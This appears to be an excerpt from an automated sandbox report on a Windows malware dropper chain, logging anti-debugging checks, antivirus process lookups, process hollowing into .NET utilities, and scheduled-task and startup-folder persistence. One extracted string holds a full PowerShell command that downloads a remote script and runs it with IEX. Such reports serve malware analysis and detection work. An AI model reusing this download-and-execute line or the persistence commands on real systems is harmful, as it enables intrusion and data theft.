Source: 3546345.exe, 00000025.00000002.4763090277.000000000112E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlln
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dllal\
Source: meta.exe, 00000027.00000002.3873284492.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BB800000.00000004.00001000.00020000.00000000.sdmp, meta.exe, 00000027.00000000.3447262254.00007FF617EB7000.00000002.00000001.01000000.00000013.sdmp, meta.exe, 00000027.00000002.3650886377.00000220BC200000.00000004.00001000.00020000.00000000.sdmp, meta.exe.11.dr, meta[1].exe.11.dr	Binary or memory string: qEMutating a value collection derived from a dictionary is not allowed.Y
Source: RegAsm.exe, 00000033.00000002.3597562499.0000000000479000.00000040.00000400.00020000.00000000.sdmp, D0nMCdvUeB.exe.51.dr	Binary or memory string: HgFSVDCVdb86m2CfHM1
Source: Cerker.exe, 0000001C.00000003.4062158892.00000000011DD000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001198000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000C6F000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000002.4622434555.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000022.00000003.3445287126.0000000000CE2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Cerker.exe, 0000001B.00000002.3273140765.000000000050E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: vmtoolsd.dll.0\
Source: RegAsm.exe, 0000002E.00000002.4809129127.00000000056AF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllk
Source: channel2[1].exe.11.dr	Binary or memory string: (32-bit)DBGIsolatedStorageIdentityNexusIntegrationUnknown %dMovavi Video ConverterMovavi Video Editor/c powershell -NoP -NonI -ExecutionPolicy Bypass -Command "$Resp = Invoke-WebRequest -Uri 'https://update-ledger.net/update' -UseBasicParsing -UserAgent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.0.0 Safari/537.36'; $Scr = [System.Text.Encoding]::UTF8.GetString($Resp.Content); IEX $Scr"Free_PDF_SolutionsLenovoServiceBridgeVMwareu^
Source: Cerker.exe, 0000001C.00000002.4613814551.0000000001205000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000001C.00000003.4062158892.0000000001205000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWV!t
Source: Channel1[1].exe.11.dr	Binary or memory string: ey&[ySUPERAntiSpywareCrashReportClientContacts.VirtualBoxLenovoServiceBridgeEdrawFree_PDF_SolutionsVMwarewalletsLGHUBLogitechAnkamaw+bMegaDownloaderThinkBuzanCode CacheABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/ODISWindowsCommsOpera Software\Opera GX StableatomNichromeCyberLinkMetroVALORANT>
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe@\jq
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000033CE000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: \qemu-ga.exe`,jq
Source: winmsbt.exe, 00000021.00000002.4601446833.000000000102C000.00000004.00000020.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 0000002A.00000002.4739504594.000000001BCC8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Process information queried: ProcessInformation

Jump to behavior

Checks if the current process is being debugged

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process queried: DebugPort
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process queried: DebugPort

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006245D5 BlockInput,

19_2_006245D5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_005C5240

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005E5CAC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

19_2_005E5CAC

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe

Code function: 0_2_00406312 GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_00406312

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF0DD mov eax, dword ptr fs:[00000030h]	24_2_00CBF0DD
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF099 mov eax, dword ptr fs:[00000030h]	24_2_00CBF099
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB5760 mov eax, dword ptr fs:[00000030h]	24_2_00CB5760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F0DD mov eax, dword ptr fs:[00000030h]	27_2_0075F0DD
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00755760 mov eax, dword ptr fs:[00000030h]	27_2_00755760
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F099 mov eax, dword ptr fs:[00000030h]	27_2_0075F099
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043DCE2 mov eax, dword ptr fs:[00000030h]	31_2_0043DCE2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00439F7B mov eax, dword ptr fs:[00000030h]	31_2_00439F7B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02A0FACB push dword ptr fs:[00000030h]	31_2_02A0FACB
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2A1E2 mov eax, dword ptr fs:[00000030h]	31_2_02B2A1E2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF092B mov eax, dword ptr fs:[00000030h]	31_2_02AF092B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2DF49 mov eax, dword ptr fs:[00000030h]	31_2_02B2DF49
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF0D90 mov eax, dword ptr fs:[00000030h]	31_2_02AF0D90

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006088CD GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

19_2_006088CD

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process token adjusted: Debug
Source: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process token adjusted: Debug
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process token adjusted: Debug

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DA354 SetUnhandledExceptionFilter,	19_2_005DA354
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DA385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	19_2_005DA385
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	24_2_00CB0811
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB3DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00CB3DF3
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	24_2_00CB0594
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB06F7 SetUnhandledExceptionFilter,	24_2_00CB06F7
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750811 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	27_2_00750811
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00753DF3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00753DF3
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750594 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	27_2_00750594
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007506F7 SetUnhandledExceptionFilter,	27_2_007506F7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043A4FE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_0043A4FE
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004215F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_004215F5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00420C37 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_00420C37
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2A765 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_02B2A765
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B1185C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	31_2_02B1185C
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B10E9E SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	31_2_02B10E9E

Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe

Code function: 24_2_00C94780 CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,VirtualAllocEx,GetLastError,VirtualAllocEx,WriteProcessMemory,SetThreadContext,WriteProcessMemory,VirtualProtectEx,WriteProcessMemory,VirtualProtectEx,ResumeThread,

24_2_00C94780

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base address: 400000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base address: 400000

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 42E000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 48A000
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 11DC008
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 432000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 450000
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: DCD008
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 426000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 434000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 436000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 50B000
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: E86008

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00609369 LogonUserW,

19_2_00609369

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005C5240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,KiUserCallbackDispatcher,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

19_2_005C5240

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00611AC6 SendInput,keybd_event,

19_2_00611AC6

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_006151E2 mouse_event,

19_2_006151E2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Honda Honda.bat & Honda.bat & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 591950	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "BachelorRayPotentialBeats" Itsa	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Competent + ..\Screw + ..\Whom + ..\Reveal + ..\Provides + ..\Still + ..\Entrepreneurs + ..\Greatest + ..\Corporate + ..\Wireless E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif Shipment.pif E	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe "C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe "C:\Users\user\AppData\Local\Temp\1000142101\build2.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe "C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe "C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe "C:\Users\user\AppData\Local\Temp\1000194001\meta.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe "C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Statistics" /tr "wscript //B 'C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js'" /sc minute /mo 5 /F	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr" "C:\Users\user\AppData\Local\TrackGuard Technologies\z"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Process created: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe "C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe"
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000169001\contorax.exe	Process created: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe "C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000194001\meta.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000219001\GOLD.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: unknown unknown

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & echo url="c:\users\user\appdata\local\trackguard technologies\guardtrack.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardtrack.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

19_2_006088CD

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

19_2_00614F1C

Source: Shipment.pif, 0000000B.00000000.2048496532.0000000000A06000.00000002.00000001.01000000.00000006.sdmp, Shipment.pif, 0000000B.00000003.2056731275.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, GuardTrack.scr, 00000013.00000000.2073972138.0000000000666000.00000002.00000001.01000000.00000008.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: GuardTrack.scr	Binary or memory string: Shell_TrayWnd
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: GetProgmanWindow
Source: InstallUtil.exe, 00000032.00000002.3758938143.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SetProgmanWindow

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_005D885B cpuid

19_2_005D885B

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC688E
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC6843
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CBC03B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	24_2_00CC69B4
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: EnumSystemLocalesW,	24_2_00CC6929
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CC6C07
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CBC59D
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	24_2_00CC65A1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	24_2_00CC6D2D
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetLocaleInfoW,	24_2_00CC6E33
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	24_2_00CC6F02
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_00766843
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_0075C03B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_0076688E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: EnumSystemLocalesW,	27_2_00766929
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	27_2_007669B4
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_00766C07
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	27_2_00766D2D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	27_2_007665A1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_0075C59D
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetLocaleInfoW,	27_2_00766E33
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	27_2_00766F02

Queries information about the installed CPU (vendor, model number etc)

Source: C:\Users\user\AppData\Local\Temp\1000172001\3546345.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	Queries volume information: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif VolumeInformation	Jump to behavior
